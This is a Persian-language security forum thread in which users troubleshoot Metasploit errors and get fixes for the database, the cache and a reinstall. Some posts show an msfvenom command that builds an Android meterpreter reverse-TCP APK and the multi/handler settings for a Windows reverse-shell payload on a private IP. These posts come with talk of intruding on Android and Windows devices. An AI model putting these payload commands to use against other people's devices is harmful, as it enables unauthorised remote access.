رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

metasploit

پست های پیشنهاد شده

سلام دوستان عزیز من در اجرای متاسپلویت مشکل دارم وقتی دستور msfconsole میزنم متاسپلویت اجرا نمیشه و اروری که عکسشو گذاشتمو میده لطفا کمکم کنید .

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام اگر این مشکل رو دارید و این اررور رو میگیرید:

Database not connected or cache not built, using slow search

این اررور بدلیل متصل نبودن متااسپلویت به دیتابیس  و ایجاد نشدن حافظه کش برای جستجو ایجاد میشود...

برای اینکار میبایست  دستورات زیر را  وارد کنید (درصورتی که مشکل از پایگاه داده باشد)

sudo service postgresql start

sudo service metasploit start

و در صورتی که مشکل از حافظه موقت باشد(cache) میبایست دستورات زیررا وارد کنید:

db_rebuild_cache

و برای پایدار ساختن تنظیمات برنامه از دستور زیر استفاده کنید: 

update-rc.d postgresql enable

update-rc.d metasploit enable

اگه سوالی داشتی بپرس:/

لینک به دیدگاه

در ۱ ساعت قبل، DSh_A گفته است :

سلام اگر این مشکل رو دارید و این اررور رو میگیرید:

Database not connected or cache not built, using slow search

این اررور بدلیل متصل نبودن متااسپلویت به دیتابیس  و ایجاد نشدن حافظه کش برای جستجو ایجاد میشود...

برای اینکار میبایست  دستورات زیر را  وارد کنید (درصورتی که مشکل از پایگاه داده باشد)

sudo service postgresql start

sudo service metasploit start

و در صورتی که مشکل از حافظه موقت باشد(cache) میبایست دستورات زیررا وارد کنید:

db_rebuild_cache

و برای پایدار ساختن تنظیمات برنامه از دستور زیر استفاده کنید: 

update-rc.d postgresql enable

update-rc.d metasploit enable

اگه سوالی داشتی بپرس:/

ﺳﻼﻡ ﻣﻤﻨﻮﻥ ﺑﺎﺑﺖ ﺭاﻫﻨﻤﺎﻳﻲ ﻭﻟﻲ ﺑﺎﺯﻡ ﻧﺸﺪ ﻫﻢ ﺗﻮﻱ ﮔﻮﺷﻴﻢ اﻳﻦﺟﻮﺭﻱ ﻣﻴﺸﻪ ﻫﻢ ﻛﺎﻣﭙﻴﻮﺗﺮ , ﻧﻤﻴﺪﻭﻧﻢ اﺯ ﭼﻴﻪ ﻧﻪ ﻣﻴﺘﻮﻧﻢ ﭘﻴﻠﻮﺩ ﺑﺴﺎﺯﻡ ﭘﻪ ﻣﺘﺎﺳﭙﻠﻮﻳﺖ اﺟﺭا ﻛﻨﻢ ﻭﻟﻲ ﺑﻌﻀﻲ ﻭﻗﺘﺎ ﻫﺮﺩﻭﺗﺎ اﺟﺮا ﻣﻴﺸﻪ ﻣﺜﻼ ﺷﺎﻳﺪ ﻫﺮ ﭘﻮﻧﺰﺩﻩ ﺑﻴﺴﺖ ﺑﺎﺭ ﻳﺒﺎﺭ اﺟﺮا ﺑﺸﻪ , اﻳﻦ اﺭﻭﺭﻭ ﻳﻪ ﺻﻔﺤﻪ ﻫﺴﺘﺶ ﺁﺩﻡ ﻧﻤﻴﺘﻮﻧﻪ ﺳﺮﭺ ﻛﻨﻪ 

لینک به دیدگاه

متاسفانه اررور شما رو نداشتم و نمیدونم رفعش کنم... 

این اررور رو داشتم و یک راه حل دادم شاید بدردتون بخوره...

یه جستجو در اینترنت بزنید اطلاعات خوبی نسیبتون میشه...

لینک به دیدگاه

در 18 ساعت قبل، biowulf گفته است :

سلام دوستان عزیز من در اجرای متاسپلویت مشکل دارم وقتی دستور msfconsole میزنم متاسپلویت اجرا نمیشه و اروری که عکسشو گذاشتمو میده لطفا کمکم کنید .

سلام دوست عزیز

راستش این range error های متفاوتی من تو اینترنت دیدم در این باره و خیلی هم متفاوت بودن از هم . من چیزی که به ذهنم رسید اینه یک بار حذف و دوباره نصبش کنید . فک می کنم مشکل هرچی بوده حل شه. یعنی امیدوارم.

برای حذف :

فقط دقت کنید به جای x هایی که گذاشتم ورژن متاسپلویتتون و وارد کنید. چند تا سوال بلی و خیر هم بعدش می پرسه که خیلی در جواب دادنش دقت کنید چون تو نصب دوبارش دچار مشکل می شید ولی چیز خاصی نداره.

برای نصب دوبارش :

اگر بازم خدایی نکرده تو نصبش مشکل پیش اومد تاپیک بزارید توضیح بدم خدمتتون.

سپاس

لینک به دیدگاه

در 23 ساعت قبل، abarestan گفته است :

سلام دوست عزیز

راستش این range error های متفاوتی من تو اینترنت دیدم در این باره و خیلی هم متفاوت بودن از هم . من چیزی که به ذهنم رسید اینه یک بار حذف و دوباره نصبش کنید . فک می کنم مشکل هرچی بوده حل شه. یعنی امیدوارم.

برای حذف :

فقط دقت کنید به جای x هایی که گذاشتم ورژن متاسپلویتتون و وارد کنید. چند تا سوال بلی و خیر هم بعدش می پرسه که خیلی در جواب دادنش دقت کنید چون تو نصب دوبارش دچار مشکل می شید ولی چیز خاصی نداره.

برای نصب دوبارش :

سپاس

ممنون درست شد . اما حالا متاسپلویت رو اجرا میکنه ولی موقع ساخت پیلود همون ارور رو میده مثلا :

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -o filename.apk 

مثلا این دستورو میزنم همون ارور میاد اما دستور msfconsole بدون مشکل اجرا میشه و کارشو ادامه میده . ( دستور بالا فقط مثال بود ) . بازم ممنون میشم کمکم کنید

لینک به دیدگاه

در 8 دقیقه قبل، biowulf گفته است :

ممنون درست شد . اما حالا متاسپلویت رو اجرا میکنه ولی موقع ساخت پیلود همون ارور رو میده مثلا :

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -o filename.apk 

مثلا این دستورو میزنم همون ارور میاد اما دستور msfconsole بدون مشکل اجرا میشه و کارشو ادامه میده . ( دستور بالا فقط مثال بود ) . بازم ممنون میشم کمکم کنید

با سلام
دوست عزیز من 2 سال قبل 2ماه تمام رویه این روشی که الان شما داری روش کار میکنی وقت گذاشتم تمام مشکلاتیم که الان شما داری رو داشتم !
بعضی از اون مشکلا حل شد بعضی هم نه! از من میشنوی بیخیال این روش واسه نفوذ به اندروید شو و راه های دیگرو امتحان کن....

لینک به دیدگاه

در 55 دقیقه قبل، Barc0d گفته است :

با سلام
دوست عزیز من 2 سال قبل 2ماه تمام رویه این روشی که الان شما داری روش کار میکنی وقت گذاشتم تمام مشکلاتیم که الان شما داری رو داشتم !
بعضی از اون مشکلا حل شد بعضی هم نه! از من میشنوی بیخیال این روش واسه نفوذ به اندروید شو و راه های دیگرو امتحان کن....

آخه میدونین هم توی کالی نت هانتر موبایلم هم کالی لینوکس لپتاپم این مشکلو دارم درحالی که نسخه های خیلی متفاوت هستن ، خب راه های دیگه نفوذ به ویندوز و اندروید شما چه راه هایی رو میگید که این مشکلو نداشته باشم باهاش ؟

لینک به دیدگاه

در 2 ساعت قبل، biowulf گفته است :

آخه میدونین هم توی کالی نت هانتر موبایلم هم کالی لینوکس لپتاپم این مشکلو دارم درحالی که نسخه های خیلی متفاوت هستن ، خب راه های دیگه نفوذ به ویندوز و اندروید شما چه راه هایی رو میگید که این مشکلو نداشته باشم باهاش ؟

تجربه بهم ثابت کرده وقتی چیزی رو از پایه و اساس بلد نیستم نرم سمتش چون اگه یک مشکل هرچقدر هم کوچیک پیش بیاد نمیتونم حلش کنم چون علمش رو ندارم!
به نظرم شما هم میتونی  یاد گیری کالی رو از پایه شروع کنی هم میتونی از پکیج های نفوذ به اندروید که تو سایت ها موجوده استفاده کنی!

لینک به دیدگاه

در 20 ساعت قبل، Barc0d گفته است :

تجربه بهم ثابت کرده وقتی چیزی رو از پایه و اساس بلد نیستم نرم سمتش چون اگه یک مشکل هرچقدر هم کوچیک پیش بیاد نمیتونم حلش کنم چون علمش رو ندارم!
به نظرم شما هم میتونی  یاد گیری کالی رو از پایه شروع کنی هم میتونی از پکیج های نفوذ به اندروید که تو سایت ها موجوده استفاده کنی!

من نگفتم کالی رو بلد نیستم توی این مدت این ارورو اصن ندیده بودم هر کاری هم کردم درست نشد پرسیدم که شاید کسایی باشن تجربه این مشکلو داشته باشن راه حلشو بگن همین 

لینک به دیدگاه

• 1 سال بعد...
On 1397/03/29, 04:31:27, abarestan said:

سلام دوست عزیز

برای حذف :

برای نصب دوبارش :

سپاس

سلام اگه کمک کنی خیلی ممنون میشم
وقتی یک پیلود میسازم 
و میرم توی
msfconsole
use explooit/multi/handler 

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x

وقتی میزنم run

*] Started reverse TCP handler on 192.168.x.x:4444

و دیگه هیچ اتفاقی نمی افته

فایر وال و انتی ویروس خاموشه
و پیلود هم در سیستم قربانی یا همون ویندوزی من است

هیچ جای اینترنت کامل ندیدم بود ولی مشکلی حل نکرد

لینک به دیدگاه

13 hours ago, h.smile.n said:

سلام اگه کمک کنی خیلی ممنون میشم
وقتی یک پیلود میسازم 
و میرم توی
msfconsole
use explooit/multi/handler 

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x

وقتی میزنم run

*] Started reverse TCP handler on 192.168.x.x:4444

و دیگه هیچ اتفاقی نمی افته

فایر وال و انتی ویروس خاموشه
و پیلود هم در سیستم قربانی یا همون ویندوزی من است

هیچ جای اینترنت کامل ندیدم بود ولی مشکلی حل نکرد

درود

بعد از این که این پیام رو داد

Enter

رو بزنید سپس دستور

رو بزنید و در پاسخ ببینید چه نشست هایی دارید

اگر نشستی داشتید باید شماره ی

id

اون رو در پاسخ دستور بالا پیدا کنید و برای نمونه اگر 1 بود دستور زیر رو بزنیید

تا نشست ساخته شده براتون باز بشه

لینک به دیدگاه

• mownten ویژه،بسته شده،پین شده،غیر ویژه،باز شده،غیر ویژه،ویژه،پین شده،بسته شده،باز شده،غیر ویژه و غیر ویژه این موضوع
  • 8 ماه بعد...
در در 29 خرداد 1397 در 16:01، abarestan گفته است :

سلام دوست عزیز

برای حذف :

برای نصب دوبارش :

سپاس

love u bro

لینک به دیدگاه

در 2 ساعت قبل، evil__sefat گفته است :

love u bro

با سلام و احترام خدمت شما کاربر محترم گاردایران

قبل از فعالیت در انجمن قوانین را مطالعه کنید

در تاپیک ها اسپم وارد نکنید پسندیدن تاپیک کافی است

موفق باشید

لینک به دیدگاه

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• ایجاد مورد جدید...